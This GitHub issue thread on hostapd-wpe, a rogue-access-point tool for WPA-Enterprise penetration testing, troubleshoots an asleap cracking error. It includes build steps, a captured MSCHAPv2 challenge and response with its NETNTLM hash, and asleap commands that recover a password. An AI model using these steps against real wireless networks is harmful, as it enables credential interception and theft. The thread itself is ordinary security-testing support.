### ISSUE TITLE
V 2.6 and V 2.9 both gives: Could not recover last 2 bytes of hash from the challenge/response.  Sorry it didn't work out                                                                                   

### ISSUE THREAD

**Issue by AdonisPro** [OpenSecurityResearch/hostapd-wpe#32]
Hello Team,

While trying to pentest wpa-enterprise, i have faced the issue mentioned in the subject line. From google history i came across that this issue came earlier too but you guys fixed this. Not sure why this is again hit in case of me. 

Initially i installed hostapd-wpe by **apt get hostapd-wpe** which installed **V2.9** and for that i hit the issue.

**Just to mention, i am hitting the issue for non domain user.** 

Now, while going through the Readme and issue #19  of this repo, i followed the steps mentioned, 

    General - 
    ------------------------------------------------------------------------
    	Now apply the hostapd-wpe.patch:
        
        $ git clone https://github.com/OpenSecurityResearch/hostapd-wpe

        $ **wget http://hostap.epitest.fi/releases/hostapd-2.6.tar.gz** -- This link is working but the link you provided in Readme is not working. 
        $ tar -zxf hostapd-2.6.tar.gz
        $ cd hostapd-2.6
        $ patch -p1 < ../hostapd-wpe/hostapd-wpe.patch 
        $ cd hostapd
        
        If you're using Kali 2.0 edit .config file and uncomment:
        CONFIG_LIBNL32=y
        
        $ make

        I copied the certs directory and scripts from FreeRADIUS to ease that 
        portion of things. You should just be able to:

        $ cd ../../hostapd-wpe/certs
        $ ./bootstrap

        then finally just:
        
        $ cd ../../hostapd-2.6/hostapd
        $ sudo ./hostapd-wpe hostapd-wpe.conf

**_Now, when i try to login, below is the o/p i receive in case of hostapd-wpe version 2.6:_**

root@kali:~/hostapd-2.6/hostapd# ./hostapd-wpe hostapd-wpe.conf
Configuration file: hostapd-wpe.conf
Using interface wlan0 with hwaddr xxxxxxx and ssid "test"
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED 
wlan0: STA xxxxxxxx IEEE 802.11: associated
wlan0: CTRL-EVENT-EAP-STARTED xxxxxxxx
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25

mschapv2: Mon Feb 28 17:26:36 2022
         **username:      test
         challenge:     53:7a:33:3a:a2:08:38:07
         response:      95:e1:4a:5b:6c:0a:18:26:8e:18:7b:da:0b:30:c4:d8:af:d3:38:ad:c5:f3:86:ae
         jtr NETNTLM:   test:$NETNTLM$537a333aa2083807$95e14a5b6c0a18268e187bda0b30c4d8afd338adc5f386ae**
wlan0: STA 9c:30:5b:12:55:9d IEEE 802.11: disassociated
wlan0: INTERFACE-DISABLED 
wlan0: INTERFACE-ENABLED 

Now when i try to crack it using **asleap**, i get the below o/p:

**root@kali:~# asleap -C 53:7a:33:3a:a2:08:38:07 -R 95:e1:4a:5b:6c:0a:18:26:8e:18:7b:da:0b:30:c4:d8:af:d3:38:ad:c5:f3:86:ae -W rockyou.txt 
asleap 2.3 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>                                                                                                         
Using wordlist mode with "rockyou.txt".                                                                                                                                          
        Could not recover last 2 bytes of hash from the                                                                                                                          
        challenge/response.  Sorry it didn't work out.** 

I'd earnestly request you to please help me so that i can succeed in this. Its an earnest request to you all. @brad-anton @s0lst1c3 @SvenTo @Rogdham and all. 

Thanks & Regards

**Comment by Rogdham** [comment]
Hello,

With your challenge and hash, it's working on my side.

I've put only the expected password in the file `/tmp/w` (but it should work with rockyou.txt), and here is my run:

```
$ asleap -C 53:7a:33:3a:a2:08:38:07 -R 95:e1:4a:5b:6c:0a:18:26:8e:18:7b:da:0b:30:c4:d8:af:d3:38:ad:c5:f3:86:ae -W /tmp/w
asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using wordlist mode with "/tmp/w".
	hash bytes:        4fef
	NT hash:           b3ec3e03e2a202cbd54fd104b8504fef
	password:          abcd1234
```

_Edit: I can see that we don't have the same version of asleap, maybe there is an issue with version 2.3? I really don't know_

So I'm not sure what your issue is, but it seems to be with `asleap` and not `hostapd-wpe`.

**Comment by AdonisPro** [comment]
@Rogdham 

Thanks a lot for your kind response. I'd request you to please please bear with me for some time before closing the issue as i am trying best to solve it by changing the asleap version. 

If that also doesn't work then i'll again update and if works then also will update to you.

Just a humble question? Did i miss anything or technically did anything wrong so far the logs i pasted are concerned? 

Thanks & Regards

**Comment by AdonisPro** [comment]
@Rogdham 

Yes, YOu are very correct. I tested it with asleap 2.2 and got the o/p. Thanks a lot for your help and support.

Closing the issue.

Thanks & Regards
